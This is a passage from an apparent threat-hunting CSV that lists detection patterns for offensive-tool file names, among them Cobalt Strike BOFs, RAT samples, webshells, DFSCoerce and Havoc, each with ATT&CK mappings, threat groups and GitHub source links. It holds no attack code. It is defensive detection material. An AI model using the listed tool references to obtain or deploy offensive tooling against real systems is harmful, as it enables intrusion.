TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","6540" "*/Dent/Loader*",".{0,1000}\/Dent\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - 
DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","6541" "*/DenyOutboundFirewall.ahk*",".{0,1000}\/DenyOutboundFirewall\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6542" "*/DeployPrinterNightmare.exe*",".{0,1000}\/DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","6543" "*/DeployPrinterNightmare.exe*",".{0,1000}\/DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","6544" "*/DesckVB Rat.exe*",".{0,1000}\/DesckVB\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6545" "*/describeTicket.py*",".{0,1000}\/describeTicket\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6546" "*/DesertFox/archive/*.zip*",".{0,1000}\/DesertFox\/archive\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan 
- LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","6547" "*/DesktopShell.exe*",".{0,1000}\/DesktopShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","6548" "*/detail/kali-linux/*",".{0,1000}\/detail\/kali\-linux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6549" "*/detect_antivirus/*.js*",".{0,1000}\/detect_antivirus\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","6550" "*/detect_antivirus/*.rb*",".{0,1000}\/detect_antivirus\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","6551" "*/detect-hooks.c*",".{0,1000}\/detect\-hooks\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6552" "*/detect-hooks.cna*",".{0,1000}\/detect\-hooks\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6553" 
"*/detect-hooks.h*",".{0,1000}\/detect\-hooks\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6554" "*/Detect-Hooks/*",".{0,1000}\/Detect\-Hooks\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6555" "*/Devils-Rat *.exe*",".{0,1000}\/Devils\-Rat\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6556" "*/Devils-Rat 
8.0.exe*",".{0,1000}\/Devils\-Rat\s8\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6557" "*/devilzShell.asp*",".{0,1000}\/devilzShell\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6558" "*/devilzShell.cgi*",".{0,1000}\/devilzShell\.cgi.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6559" "*/devilzShell.jsp*",".{0,1000}\/devilzShell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6560" "*/devilzShell.php*",".{0,1000}\/devilzShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6561" 
"*/DFSCoerce.exe*",".{0,1000}\/DFSCoerce\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","6562" "*/DFSCoerce.git*",".{0,1000}\/DFSCoerce\.git.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","6563" "*/dfscoerce.py*",".{0,1000}\/dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6564" "*/DGPOEdit.zip*",".{0,1000}\/DGPOEdit\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6565" "*/dhcp-discover.nse*",".{0,1000}\/dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6566" "*/dhcpd-noroute.conf*",".{0,1000}\/dhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","6567" "*/Dialogs/Payload.hpp*",".{0,1000}\/Dialogs\/Payload\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6568" "*/Diamond RAT Cracked.exe*",".{0,1000}\/Diamond\sRAT\sCracked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware 
RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6569" "*/Diamorphine.git*",".{0,1000}\/Diamorphine\.git.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","6570" "*/dicassassin.7z*",".{0,1000}\/dicassassin\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","6571" "*/dicom-brute.nse*",".{0,1000}\/dicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6572" "*/dicom-ping.nse*",".{0,1000}\/dicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6573" "*/dict-info.nse*",".{0,1000}\/dict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6574" "*/dicts/ftp_default.txt*",".{0,1000}\/dicts\/ftp_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6575" "*/DigitalOceanProxyTab.java*",".{0,1000}\/DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense 
Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","6576" "*/DInjector.git*",".{0,1000}\/DInjector\.git.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","6577" "*/DInvoke/*",".{0,1000}\/DInvoke\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","6578" "*/DInvokeResolver/*",".{0,1000}\/DInvokeResolver\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - 